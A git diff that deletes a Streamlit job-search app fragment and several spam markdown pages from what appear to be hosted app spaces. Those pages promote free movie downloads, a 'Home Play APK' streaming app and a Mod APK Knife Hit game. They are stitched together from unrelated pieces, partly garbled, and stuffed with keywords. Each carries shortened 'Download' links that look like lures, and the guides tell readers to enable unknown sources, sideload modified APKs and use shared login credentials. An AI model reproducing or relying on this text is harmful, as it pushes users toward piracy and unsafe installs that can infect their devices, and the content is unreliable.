get_specific_category(model, data, 'marketing', corpus_embeddings) - marketing_bt = st.button(f'Marketing ({marketing_count})') - with col4: - social_media_count = get_specific_category(model, data, 'social media', corpus_embeddings) - social_media_bt = st.button(f'Social Media ({social_media_count})') - with col5: - arts_design_count = get_specific_category(model, data, 'design and creative', corpus_embeddings) - arts_design_bt = st.button(f'Arts & Design ({arts_design_count})') - with col6: - computer_count = get_specific_category(model, data, 'engineer', corpus_embeddings) - computer_bt = st.button(f'Computer Science ({computer_count})') - with col7: - business_count = get_specific_category(model, data, 'business and management', corpus_embeddings) - business_bt = st.button(f'Business and Management ({business_count})') - - job_title = st.text_input('Insert the job title below:', '') - submitted = st.button('Submit') - - if data_bt: - job_title = 'data' - if finance_bt: - job_title = 'finance and accounting' - if business_bt: - job_title = 'business and management' - if marketing_bt: - job_title = 'marketing' - if social_media_bt: - job_title = 'social media' - if arts_design_bt: - job_title = 'design and creative' - if computer_bt: - job_title = 'engineer and developer' - - if submitted or data_bt or finance_bt or marketing_bt or social_media_bt or arts_design_bt or computer_bt or business_bt: - print(job_title + ',' + str(pd.Timestamp.now())) - st.info(f'Showing most similar results for {job_title}...') - result = get_similarity_score(model, data, job_title, corpus_embeddings) - result = result[columns] - show_aggrid_table(result) - -if __name__ == '__main__': - main() diff --git a/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md b/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md deleted file mode 100644 index 2e882e0998e3f571ae9f811e71b2ca68cb0d9c05..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/HD Online Player (ncis S01-s12 Complete 720p 1080p Web) EXCLUSIVE.md +++ /dev/null @@ -1,23 +0,0 @@ -
      -

      How to Watch NCIS Seasons 1-12 in HD Online

      -

      If you are a fan of NCIS, the popular crime drama series that follows the cases of the Naval Criminal Investigative Service, you might be wondering how to watch all the episodes from seasons 1 to 12 in high definition online. Well, you are in luck because we have found the best HD online player that lets you stream NCIS s01-s12 complete 720p 1080p web quality without any hassle.

      -

      HD Online Player (ncis s01-s12 complete 720p 1080p web)


      Download Zip > https://bytlly.com/2uGkeK



      -

      The HD online player we are talking about is called Example, and it is a free and legal streaming service that offers a huge library of TV shows and movies, including NCIS. You can watch NCIS on Example on any device, such as your laptop, smartphone, tablet, or smart TV. All you need is a stable internet connection and a free account.

      -

      Here are some of the benefits of using Example to watch NCIS seasons 1-12 in HD online:

      -
        -
      • You can choose between 720p and 1080p resolution, depending on your preference and bandwidth.
      • -
      • You can enjoy fast and smooth streaming without any buffering or lagging.
      • -
      • You can access all the episodes from seasons 1 to 12, as well as the latest episodes from season 13.
      • -
      • You can watch NCIS with subtitles in various languages, such as English, Spanish, French, German, and more.
      • -
      • You can create your own watchlist and resume watching from where you left off.
      • -
      • You can share your favorite episodes with your friends on social media.
      • -
      -

      So, what are you waiting for? If you want to watch NCIS seasons 1-12 in HD online, head over to Example and sign up for a free account. You will be amazed by the quality and convenience of this HD online player. Don't miss this opportunity to binge-watch one of the best crime drama series ever made.

      - -

      If you are still not convinced that Example is the best HD online player for watching NCIS seasons 1-12, let us tell you more about the show and why you should watch it. NCIS stands for Naval Criminal Investigative Service, and it is a team of special agents who investigate crimes involving the U.S. Navy and Marine Corps. The show follows the adventures of Leroy Jethro Gibbs, the leader of the team, and his colleagues, such as Anthony DiNozzo, Ziva David, Timothy McGee, Abby Sciuto, and more.

      -

      NCIS is one of the longest-running and most successful TV series in history, with over 400 episodes and 18 seasons. It has won several awards and nominations, such as the People's Choice Award, the Primetime Emmy Award, and the Golden Globe Award. It has also spawned several spin-offs, such as NCIS: Los Angeles, NCIS: New Orleans, and NCIS: Hawai'i.

      -

      NCIS is not just a typical crime drama series. It is also a show that explores the personal lives and relationships of the characters, as well as their humor and camaraderie. It is a show that combines action, suspense, mystery, romance, comedy, and drama in a perfect balance. It is a show that will keep you hooked and entertained for hours.

      -

      So, if you are looking for a great TV show to watch online in HD quality, look no further than NCIS seasons 1-12 on Example. You will not regret it. Trust us.

      -

      d5da3c52bf
      -
      -
      \ No newline at end of file diff --git a/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md b/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md deleted file mode 100644 index ffb3f3e299ac063ca1d81c2e8b21ff562cfe73ca..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/Jagged Vs Sayuri [HOT].md +++ /dev/null @@ -1,38 +0,0 @@ -

      jagged vs sayuri


      DOWNLOAD –––––>>> https://bytlly.com/2uGkMX



        -
        -It supports lots of different file types: MP4, MPEG, AVI, MP3, OGG, SRT, SRT MP3. Most of the videos can be streamed.
        -
        -Best Learning, Development and Business Apps for iOS and Android
        -
        -Developer: SocialTango Inc., price: Free
        -
        -Inexpensive yet very powerful application. The most useful features for me are TTS to speech, automatic website translation, dictionary and built-in browser. With such a number of options it is very likely you will find your favourite one!
        -
        -Developer: GreenPanda, price: Free
        -
        -App for taking notes on the go. I tried over 100 different writing apps, but only GreenPanda comes near to my expectations. It allows to create a beautiful report, export to PDF and printing, and sync the notes via DropBox. It also supports text styles, types, photos, voice notes, and more.
        -
        -Developer: Cogent Labs Inc., price: Free
        -
        -Compatibility: iOS, Windows, Android, Mac OS X
        -
        -Very simple and yet powerful application for time-tracking and project management. The app can be used as a web app, mobile app or extension in Chrome or Safari. It has lots of features including hours, projects, start and end date, task time, description, etc. and it is also available for Chrome on the web, as a Chrome extension, and as a native Windows 8 app.
        -
        -Developer: LuckyCat Inc., price: Free
        -
        -Compatibility: iOS, Android, Windows, Mac OS X
        -
        -A new and unique tool for screencasting. It offers comprehensive features to create video tutorials, record video tutorials, show slides, add elements and effects, etc. It can also be used for record video, audio editing, mobile recording, online screencasting, and more.
        -
        -Developer: ZAIT Interactive Inc., price: $9.99
        -
        -Compatibility: iOS, Android, Windows, Mac OS X, Linux
        -
        -An awesome and simple application for recording voice messages. It allows you to record voice message, send to friends or family, preview or send via iMessage, etc. Moreover, it records up to 60 seconds.
        -
        -Developer: Lokalise Inc., price: $3.99
        -
        -For all those who are looking for a tool to organise and keep track of projects, Lobsters is a good choice. 4fefd39f24
        
      -
      -
      -

      diff --git a/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md b/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md deleted file mode 100644 index 7e1c95f3ec5f892ea458e99d2e3c9cf3316a3626..0000000000000000000000000000000000000000 --- a/spaces/terfces0erbo/CollegeProjectV2/Kamus Jamak Taksir Pdf Download [BETTER].md +++ /dev/null @@ -1,9 +0,0 @@ -

      Kamus Jamak Taksir Pdf Download


      DOWNLOAD » https://bytlly.com/2uGklp



      -
      -DOWNLOAD: 3dd2be366a. Related Links: Kamus Jamak Taksir Pdf Download Kamus Jamak Taksir Pdf Download Jeena Sirf Merre Liye Hd ... Camus Jamak Taksir Download Pdf. -Camus Jamak Taksir Download Pdf Camus Jamak Taksir Download Pdf Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Kamus -Download Camus Jamak Taksir Pdf Download -Camus Jamak Taksir Download Pdf Kamus Jamak Taksir Download Pdf Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf Download Camus Jamak Taksir Pdf 8a78ff9644
      -
      -
      -

      diff --git a/spaces/thejagstudio/procom/procom/__init__.py b/spaces/thejagstudio/procom/procom/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md b/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md deleted file mode 100644 index 542cf2874aef2f6a0c26b21d17e582c04697bc64..0000000000000000000000000000000000000000 --- a/spaces/tialenAdioni/chat-gpt-api/logs/Download Kal Ho Naa Ho HD 720p Full Movie in Hindi - Learn More About the Cultural and Social Themes of the Film.md +++ /dev/null @@ -1,72 +0,0 @@ -
      -```html -

      How to Download Kal Ho Naa Ho HD 720p Full Movie in Hindi

      -

      Kal Ho Naa Ho is a 2003 romantic comedy-drama film starring Shah Rukh Khan, Preity Zinta and Saif Ali Khan. The film was a huge hit at the box office and received critical acclaim for its story, performances and music. If you are a fan of this film and want to watch it in high quality, you might be wondering how to download Kal Ho Naa Ho HD 720p full movie in Hindi.

      -

      Well, there are several ways to do that, but not all of them are legal or safe. Some websites might offer you free downloads of the movie, but they could also infect your device with malware or viruses. Some websites might ask you to pay a fee or sign up for a subscription, but they could also scam you or steal your personal information. So, how can you download Kal Ho Naa Ho HD 720p full movie in Hindi without any risk?

      -

      downloadKalHoNaaHohd720pfullmovieinhindi


      Download Ziphttps://urlcod.com/2uK7Mc



      -

      The best way to download Kal Ho Naa Ho HD 720p full movie in Hindi is to use a reliable and reputable online platform that offers legal and secure downloads of movies and shows. One such platform is Hotstar, which is India's leading streaming service that has a huge collection of movies, shows, sports and news. Hotstar has the official rights to stream Kal Ho Naa Ho in HD quality, and you can also download it offline on your device.

      -

      To download Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar, you need to follow these simple steps:

      -
        -
      1. Download the Hotstar app on your device or visit the Hotstar website on your browser.
      2. -
      3. Sign up for a Hotstar account or log in with your existing account.
      4. -
      5. Search for Kal Ho Naa Ho in the search bar or browse through the movies section.
      6. -
      7. Select the movie and click on the download icon below the player.
      8. -
      9. Choose the HD 720p quality option and wait for the download to complete.
      10. -
      11. Enjoy watching Kal Ho Naa Ho offline on your device anytime and anywhere.
      12. -
      -

      That's it! You have successfully downloaded Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar. You can also download other movies and shows from Hotstar in the same way. Hotstar offers a free trial for new users, so you can try it out before deciding to subscribe. Hotstar also has affordable plans that suit your budget and preferences. So, what are you waiting for? Download Hotstar today and watch Kal Ho Naa Ho and other amazing content in HD quality.

      -``` - -```html -

      Now that you have downloaded Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar, you might be wondering what the movie is about. Well, here is a brief summary of the plot:

      -

      Kal Ho Naa Ho is set in New York City, where Naina (Preity Zinta) is a pessimistic and unhappy MBA student who lives with her widowed mother, her grandmother and her younger brother and sister. Her life changes when she meets Aman (Shah Rukh Khan), a cheerful and friendly neighbor who tries to help her and her family overcome their problems. Aman also falls in love with Naina, but he hides a secret that prevents him from expressing his feelings. Meanwhile, Naina's best friend Rohit (Saif Ali Khan) also realizes that he loves Naina and proposes to her. Who will Naina choose? And what is Aman's secret? Watch Kal Ho Naa Ho to find out.

      -

      Kal Ho Naa Ho is a heartwarming and emotional film that will make you laugh, cry and fall in love. The film has a brilliant soundtrack composed by Shankar-Ehsaan-Loy, with songs like "Kal Ho Naa Ho", "Pretty Woman", "Maahi Ve" and "Kuch To Hua Hai". The film also has stunning cinematography by Anil Mehta, who captures the beauty of New York and India. The film also has a stellar cast of supporting actors like Jaya Bachchan, Sushma Seth, Reema Lagoo, Lilette Dubey and Delnaaz Paul.

      -

      Kal Ho Naa Ho full movie download hd 720p
      -Watch Kal Ho Naa Ho online free hd quality
      -Kal Ho Naa Ho 2003 hindi movie download 720p
      -Kal Ho Naa Ho Shah Rukh Khan Preity Zinta movie download
      -Download Kal Ho Naa Ho comedy drama musical film hd
      -Kal Ho Naa Ho Netflix streaming download 720p
      -Kal Ho Naa Ho IMDb rating reviews download hd
      -Kal Ho Naa Ho romantic film by Nikhil Advani download
      -Kal Ho Naa Ho soundtrack songs mp3 download 720p
      -Kal Ho Naa Ho subtitles english hindi download hd
      -Kal Ho Naa Ho Saif Ali Khan Jaya Bachchan movie download
      -Kal Ho Naa Ho box office collection awards download 720p
      -Kal Ho Naa Ho plot summary story download hd
      -Kal Ho Naa Ho trailer video youtube download 720p
      -Kal Ho Naa Ho wikipedia information facts download hd
      -Kal Ho Naa Ho best scenes dialogues download 720p
      -Kal Ho Naa Ho remake sequel rumors download hd
      -Kal Ho Naa Ho behind the scenes making of download 720p
      -Kal Ho Naa Ho cast and crew interviews download hd
      -Kal Ho Naa Ho deleted scenes bloopers download 720p
      -Kal Ho Naa Ho movie poster wallpaper download hd
      -Kal Ho Naa Ho fan art memes gifs download 720p
      -Kal Ho Naa Ho fan fiction stories reviews download hd
      -Kal Ho Naa Ho quotes lyrics captions download 720p
      -Kal Ho Naa Ho analysis themes messages download hd
      -DownloadKalHoNaaHoHD1080pfullmovieinhindi
      -DownloadKalHoNaaHoHD4Kfullmovieinhindi
      -DownloadKalHoNaaHoHDblurayfullmovieinhindi
      -DownloadKalHoNaaHoHDdvdripfullmovieinhindi
      -DownloadKalHoNaaHoHDmkvfullmovieinhindi
      -DownloadKalHoNaaHoHDmp4fullmovieinhindi
      -DownloadKalHoNaaHoHDavi fullmovieinhindi
      -DownloadKalHoNaaHotorrentmagnetlinkfullmovieinhindi
      -DownloadKalHoNaaHodirectlinkfullmovieinhindi
      -DownloadKalHoNaaHofromNetflixAmazonPrimeHotstarfullmovieinhindi
      -DownloadKalHoNaaHofromIMDbWikipediaRottenTomatoesfullmovieinhindi
      -DownloadKalHoNaaHofromYashRajFilmsDharmaProductionsfullmovieinhindi
      -DownloadKalHoNaaHofromShankarEhsaanLoyKaranJoharfullmovieinhindi
      -DownloadKalHoNaaHofromShahRukhKhanSaifAliKhanPreityZinta fullmovieinhindi
      -DownloadKalHoNaaHofromJayaBachchanSushmaSethReemaLagoo fullmovieinhindi
      -HowtodownloadKalHoNaaHohd720pfullmovieinhindi
      -WheretodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhentodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhytodownloadKalHoNaaHohd720pfullmovieinhindi
      -WhattoexpectfromdownloadKalHoNaaHohd720pfullmovieinhindi

      -

      Kal Ho Naa Ho is a must-watch film for anyone who loves romance, comedy and drama. It is one of the best films of Shah Rukh Khan, Preity Zinta and Saif Ali Khan, and it will leave you with a smile on your face and a tear in your eye. So, don't miss this opportunity to download Kal Ho Naa Ho HD 720p full movie in Hindi from Hotstar and enjoy this masterpiece at your convenience.

      -```

      e753bf7129
      -
      -
      \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md deleted file mode 100644 index 57a3e1fc1e41750e8f917e7e085ccc2059282f74..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Cmo descargar e instalar Home Play Apk con el usuario y contrasea correctos.md +++ /dev/null @@ -1,116 +0,0 @@ -
      -

      Home Play APK: How to Watch Free Movies and TV Shows on Your Android Device

      -

      Do you love watching movies and TV shows on your Android device? Do you want to access thousands of titles for free without any hassle? If yes, then you should try Home Play APK. Home Play APK is an amazing app that lets you stream movies and TV shows from various sources on your Android device. You can watch anything from Hollywood blockbusters to indie films, from popular TV series to documentaries, from anime to cartoons, and more. All you need is a username and password to access this app.

      -

      home play apk usuario y contraseña


      DOWNLOAD →→→ https://bltlly.com/2uOic4



      -

      What is Home Play APK?

      -

      Home Play APK is an app that allows you to watch movies and TV shows online for free on your Android device. It is not available on the Google Play Store, so you have to download it from a third-party website. Home Play APK is not affiliated with any official streaming service or provider, so it does not host any content on its own servers. Instead, it scrapes links from various sources on the internet and provides them to you in one place. You can choose from different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords.

      -

      Features of Home Play APK

      -

      Home Play APK has many features that make it one of the best apps for streaming movies and TV shows on your Android device. Here are some of them:

      -

      Large library of content

      -

      Home Play APK has a huge collection of movies and TV shows from various sources. You can find anything from the latest releases to the classics, from action to comedy, from drama to horror, and more. You can also watch TV shows from different networks, channels, and countries. You can binge-watch your favorite series or catch up with the latest episodes. Home Play APK updates its content regularly, so you can always find something new to watch.

      -

      High-quality streaming

      -

      Home Play APK offers high-quality streaming for movies and TV shows. You can choose from different resolutions, such as 360p, 480p, 720p, or 1080p, depending on your internet speed and device compatibility. You can also adjust the brightness, volume, and playback speed of the video. Home Play APK supports multiple video players, such as MX Player, VLC Player, or the default player of your device. You can also cast the video to your TV using Chromecast or other devices.

      -

      User-friendly interface

      -

      Home Play APK has a user-friendly interface that makes it easy to navigate and use. You can browse through different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords. You can also filter the results by popularity, date added, or alphabetically. You can also mark the movies and TV shows that you like as favorites, so you can access them quickly later. You can also see the details of each movie and TV show, such as the synopsis, cast, director, genre, rating, etc.

      -

      No registration or subscription required

      -

      Home Play APK does not require you to register or subscribe to use its services. You can watch movies and TV shows for free without any limitations or restrictions. You do not have to provide any personal information or payment details to access this app. You also do not have to worry about annoying ads or pop-ups that might interrupt your streaming experience.

      -

      How to Download and Install Home Play APK?

      -

      If you want to download and install Home Play APK on your Android device, you have to follow these simple steps:

      -

      Step 1: Enable unknown sources on your device

      -

      Since Home Play APK is not available on the Google Play Store, you have to enable unknown sources on your device to install it. To do this, go to Settings > Security > Unknown Sources and toggle it on. This will allow you to install apps from third-party websites.

      -

      home play apk login and password
      -how to install home play apk on android
      -home play apk account and password free
      -home play apk download latest version
      -home play apk user and pass 2023
      -best home play apk alternatives for streaming
      -home play apk premium account and password
      -home play apk mod apk unlocked
      -home play apk review and features
      -home play apk error usuario o contraseña incorrectos
      -home play apk firestick installation guide
      -home play apk contraseña y usuario actualizados
      -home play apk for pc windows 10
      -home play apk activation code and password
      -home play apk vs dark play green apk
      -home play apk smart tv compatible devices
      -home play apk contraseña y usuario gratis 2023
      -home play apk update and changelog
      -home play apk support and contact information
      -home play apk for ios iphone and ipad
      -home play apk contraseña y usuario premium
      -how to fix home play apk not working
      -home play apk for mac os x
      -home play apk contraseña y usuario ilimitados
      -home play apk vs totalplay modem
      -home play apk roku setup tutorial
      -home play apk contraseña y usuario vip
      -how to uninstall home play apk from android
      -home play apk for linux ubuntu and mint
      -home play apk contraseña y usuario sin publicidad

      -

      Step 2: Download the APK file from a trusted source

      -

      Next, you have to download the APK file of Home Play APK from a trusted source. You can use this link to download the latest version of Home Play APK. Make sure you have enough storage space on your device before downloading the file.

      -

      Step 3: Locate and install the APK file on your device

      -

      After downloading the APK file, you have to locate it on your device using a file manager app. Once you find it, tap on it and follow the instructions on the screen to install it. It might take a few seconds for the installation process to complete.

      -

      Step 4: Launch Home Play APK and enjoy

      -

      Finally, you can launch Home Play APK from your app drawer or home screen and start watching movies and TV shows for free. You will be asked to enter a username and password to access this app. You can use the default credentials or request a new account from the developer.

      -

      How to Use Home Play APK?

      -

      Using Home Play APK is very easy and simple. Here are some tips on how to use this app:

      -

      Choose a category or search for a title

      -

      You can choose from different categories, genres, languages, countries, years, ratings, etc., or search for your favorite title using keywords. You can also filter the results by popularity, date added, or alphabetically.

      -

      Select a video and choose a player

      -

      You can select a video that you want to watch and choose a player that you prefer. You can use MX Player, VLC Player, or the default player of your device. You can also cast the video to your TV using Chromecast or other devices.

      -

      Adjust the settings and enjoy your streaming

      -

      You can adjust the settings of the video according to your preferences. You can change the resolution, brightness, volume, and playback speed of the video. You can also enable subtitles, if available, or download them from external sources. You can also pause, resume, rewind, or fast-forward the video as you wish. Enjoy your streaming experience with Home Play APK.

      -

      How to Get a Username and Password for Home Play APK?

      -

      One of the things that you need to use Home Play APK is a username and password. This is because Home Play APK is a private app that requires authentication to access its content. You might be wondering why you need a username and password and how to get them. Here are some answers:

      -

      Why do you need a username and password?

      -

      You need a username and password to use Home Play APK because this app is not an official streaming service or provider. It does not host any content on its own servers, but scrapes links from various sources on the internet. This means that Home Play APK might violate some copyright laws or regulations in some countries or regions. Therefore, Home Play APK uses a username and password system to protect itself and its users from any legal issues or risks.

      -

      How to get a username and password?

      -

      There are two ways to get a username and password for Home Play APK. You can either use the default credentials or request a new account from the developer. Here are the details:

      -

      Option 1: Use the default credentials

      -

      The easiest way to get a username and password for Home Play APK is to use the default credentials that are provided by the developer. The default credentials are:

      - - - - - - - - - -
      UsernamePassword
      homeplayhomeplay
      -

      You can use these credentials to log in to Home Play APK and access its content. However, these credentials might not work sometimes, because they are shared by many users and might be changed or blocked by the developer. Therefore, you might need to use another option to get a username and password.

      -

      Option 2: Request a new account from the developer

      -

      The other way to get a username and password for Home Play APK is to request a new account from the developer. The developer of Home Play APK is very active and responsive on social media platforms, such as Facebook, Twitter, Instagram, etc. You can follow him or her on these platforms and send him or her a message asking for a new account. You can also join his or her groups or channels where he or she posts updates and news about Home Play APK. You can find the links to his or her social media accounts on the official website of Home Play APK.

      -

      When you request a new account from the developer, you have to provide some information, such as your name, email address, country, etc. The developer will then create a new account for you and send you the username and password via email or message. You can use these credentials to log in to Home Play APK and enjoy its content.

      -

      Conclusion

      -

      Home Play APK is an amazing app that lets you watch movies and TV shows for free on your Android device. You can access thousands of titles from various sources and stream them in high quality. You can also enjoy a user-friendly interface and no registration or subscription required. All you need is a username and password to use this app.

      -

      If you want to download and install Home Play APK on your Android device, you have to follow some simple steps. You have to enable unknown sources on your device, download the APK file from a trusted source, locate and install the APK file on your device, and launch Home Play APK and enjoy.

      -

      If you want to get a username and password for Home Play APK, you have two options. You can either use the default credentials or request a new account from the developer. You can contact the developer on social media platforms or join his or her groups or channels.

      -

      We hope this article has helped you learn more about Home Play APK and how to use it. If you have any questions or feedback, please feel free to leave them in the comments section below.

      -

      Frequently Asked Questions

      -

      Here are some frequently asked questions about Home Play APK:

      -

      Q: Is Home Play APK safe to use?

      -

      A: Home Play APK is safe to use as long as you download it from a trusted source and scan it with an antivirus app before installing it. Home Play APK does not contain any malware or virus that might harm your device or data. However, you should be careful about the content that you stream from Home Play APK, as some of it might be illegal or pirated in your country or region. You should always respect the rights of the content creators and owners and use Home Play APK for personal and non-commercial purposes only.

      -

      Q: Is Home Play APK legal to use?

      -

      A: Home Play APK is not an official streaming service or provider, so it does not have any license or authorization to distribute or host any content on its own servers. Home Play APK only scrapes links from various sources on the internet and provides them to you in one place. Therefore, the legality of Home Play APK depends on the laws and regulations of your country or region and the sources that you stream from. Some of the content that you stream from Home Play APK might be legal and free to watch, while some of it might be illegal or pirated and subject to copyright infringement or other legal issues. You should always check the legality of the content that you stream from Home Play APK before watching it and use a VPN or proxy service to protect your identity and privacy.

      -

      Q: How can I update Home Play APK?

      -

      A: Home Play APK updates its app regularly to fix bugs, improve performance, and add new features and content. You can update Home Play APK by following these steps:

      -
        -
      • Go to the official website of Home Play APK and download the latest version of the APK file.
      • -
      • Uninstall the previous version of Home Play APK from your device.
      • -
      • Install the new version of Home Play APK on your device using the same steps as before.
      • -
      • Launch Home Play APK and enjoy the updated app.
      • -
      -

      Q: How can I contact the developer of Home Play APK?

      -

      A: You can contact the developer of Home Play APK by following him or her on social media platforms, such as Facebook, Twitter, Instagram, etc. You can also join his or her groups or channels where he or she posts updates and news about Home Play APK. You can find the links to his or her social media accounts on the official website of Home Play APK. You can also send him or her a message or email using the contact form on the website.

      -

      Q: What are some alternatives to Home Play APK?

      -

      A: If you are looking for some alternatives to Home Play APK, you can try these apps:

      -
        -
      • Cinema HD: Cinema HD is a popular app that lets you watch movies and TV shows for free on your Android device. It has a large library of content from various sources and genres. It also has a user-friendly interface and high-quality streaming.
      • -
      • Typhoon TV: Typhoon TV is another app that allows you to watch movies and TV shows for free on your Android device. It has a huge collection of content from different categories and languages. It also has a simple interface and multiple video players.
      • -
      • CyberFlix TV: CyberFlix TV is an app that enables you to watch movies and TV shows for free on your Android device. It has a massive database of content from various sources and regions. It also has a sleek interface and fast streaming.
      • -

      401be4b1e0
      -
      -
      \ No newline at end of file diff --git a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md b/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md deleted file mode 100644 index 816f58887a19005466f1604d598d9c02a63ff38f..0000000000000000000000000000000000000000 --- a/spaces/ticomspire/turkey-syria-earthquake-tweets/logs/Download Knife Hit Mod APK for Android - Free Shopping and No Ads.md +++ /dev/null @@ -1,120 +0,0 @@ -
      -

      Download Mod APK Knife Hit: A Fun and Addictive Game of Knife Throwing

      -

      Do you love playing casual games that test your reflexes and skills? Do you enjoy throwing knives at rotating targets and avoiding obstacles? If you answered yes, then you might want to try Knife Hit, a popular game developed by Ketchapp. In this article, we will tell you everything you need to know about Knife Hit, including what it is, what are its features, and how to download its mod apk version. We will also give you some alternatives to mod apk knife hit in case you want to try other games or websites. So, let's get started!

      -

      download mod apk knife hit


      Download File » https://bltlly.com/2uOjTa



      -

      What is Knife Hit?

      -

      Knife Hit is a simple yet challenging game that requires you to throw knives at rotating targets without hitting any other knives or obstacles. The game has hundreds of levels with different themes, such as fruits, animals, zombies, pirates, and more. Each level has a boss that you need to defeat by hitting it with a certain number of knives. The game also has various knives that you can collect and use, each with its own design and effect.

      -

      The gameplay of Knife Hit

      -

      The gameplay of Knife Hit is easy to learn but hard to master. You just need to tap on the screen to throw a knife at the target. However, you need to time your taps carefully, as the target rotates at different speeds and directions. You also need to avoid hitting any other knives or obstacles that are already on the target. If you hit them, you will lose a life and have to start over. You have three lives in each level, so be careful!

      -

      The features of Knife Hit

      -

      Knife Hit has many features that make it fun and addictive. Some of them are:

      -
        -
      • Multiple levels with different themes and difficulties
      • -
      • Various knives with unique designs and effects
      • -
      • Boss fights that challenge your skills and reflexes
      • -
      • Leaderboards and achievements that track your progress and performance
      • -
      • Daily challenges and rewards that give you extra coins and knives
      • -
      • Simple graphics and sound effects that create a relaxing atmosphere
      • -
      -

      What is Mod APK Knife Hit?

      -

      Mod APK Knife Hit is a modified version of the original APK of the game on Google Play. With this version, players can enjoy exclusive hack features to easily and quickly overcome levels and missions. In addition, the mod apk version is optimized for file size, allowing players to install and experience the game smoothly on any Android device.

      -

      The benefits of Mod APK Knife Hit

      -

      Some of the benefits of Mod APK Knife Hit are:

      -

      download knife hit mod apk unlimited money
      -knife hit mod apk download latest version
      -download knife hit mod apk android 1
      -knife hit mod apk free download for android
      -download knife hit mod apk no ads
      -knife hit mod apk download apkpure
      -download knife hit mod apk all knives unlocked
      -knife hit mod apk download rexdl
      -download knife hit mod apk revdl
      -knife hit mod apk download hack
      -download knife hit mod apk unlimited apples
      -knife hit mod apk free shopping download
      -download knife hit mod apk boss unlocked
      -knife hit mod apk download 2023
      -download knife hit mod apk 1.8.19
      -knife hit mod apk download for pc
      -download knife hit mod apk offline
      -knife hit mod apk online play download
      -download knife hit mod apk unlimited everything
      -knife hit mod apk premium download
      -download knife hit mod apk vip unlocked
      -knife hit mod apk full version download
      -download knife hit mod apk with unlimited gems
      -knife hit mod apk no root download
      -download knife hit mod apk latest update
      -knife hit mod apk easy download
      -download knife hit mod apk mega mod
      -knife hit mod apk direct download link
      -download knife hit mod apk new version
      -knife hit mod apk fast download
      -download knife hit mod apk pro version
      -knife hit mod apk safe download
      -download knife hit mod apk without verification
      -knife hit mod apk original download
      -download knife hit mod apk with obb file
      -knife hit mod apk high damage download
      -download knife hit mod apk unlocked levels
      -knife hit mod apk low mb download
      -download knife hit mod apk god mode
      -knife hit mod apk best version download

      -
        -
      • Unlimited money: You can get unlimited coins in the game, which you can use to buy new knives or unlock new levels.
      • -
      • Free shopping: You can buy anything in the game without spending any money or watching any ads.
      • -
      • No ads: You can play the game without being interrupted by annoying ads.
      • -
      • All unlocked: You can access all the levels, themes, knives, and features in the game without having to complete any quests or achievements.
      • -
      -

      The risks of Mod APK Knife Hit

      -

      However, there are also some risks of Mod APK Knife Hit that you should be aware of:

      -
        -
        • Potential malware: You may download a mod apk file that contains viruses or malware that can harm your device or steal your personal information.
        • Potential ban: You may get banned from the game or from Google Play if you use a mod apk version that violates the terms and conditions of the game or the platform.
        • Potential loss of data: You may lose your progress or data in the game if you switch from the original apk to the mod apk or vice versa.
        • Potential boredom: You may lose interest in the game if you use a mod apk version that makes the game too easy or too boring.
        
      -

      How to download Mod APK Knife Hit?

      -

      If you want to download Mod APK Knife Hit, you need to follow these steps:

      -

      Step 1: Go to the APKVIPO website

      -

      The APKVIPO website is one of the best sources for mod apk files of various games and apps. You can visit their website at (https://apkvi.com/). Once you are on their homepage, you can search for Knife Hit in the search bar or browse through their categories.

      -

      Step 2: Choose the Mod APK version or the original APK version

      -

      Once you find Knife Hit on the APKVIPO website, you will see two options: Mod APK and Original APK. The Mod APK option will give you access to the hack features mentioned above, while the Original APK option will give you the same version as on Google Play. You can choose whichever option you prefer, depending on your needs and preferences.

      -

      Step 3: Click on the download button and wait for the file to be downloaded

      -

      After you choose your option, you will see a download button below it. Click on it and wait for a few seconds until a new window pops up. Then, click on the "Download Now" button and wait for the file to be downloaded to your device. The file size is about 60 MB, so make sure you have enough space and a stable internet connection.

      -

      Step 4: Click on the downloaded file and follow the instructions to install the game

      -

      Once the file is downloaded, you can click on it and follow the instructions to install the game. You may need to enable unknown sources in your device settings to allow the installation of third-party apps. After the installation is complete, you can open the game and enjoy it with or without mod features. -

      Alternatives to Mod APK Knife Hit

      -

      If you are looking for alternatives to Mod APK Knife Hit, you have two options: other knife throwing games on Google Play or other mod apk websites that offer Knife Hit.

      -

      Other knife throwing games on Google Play

      -

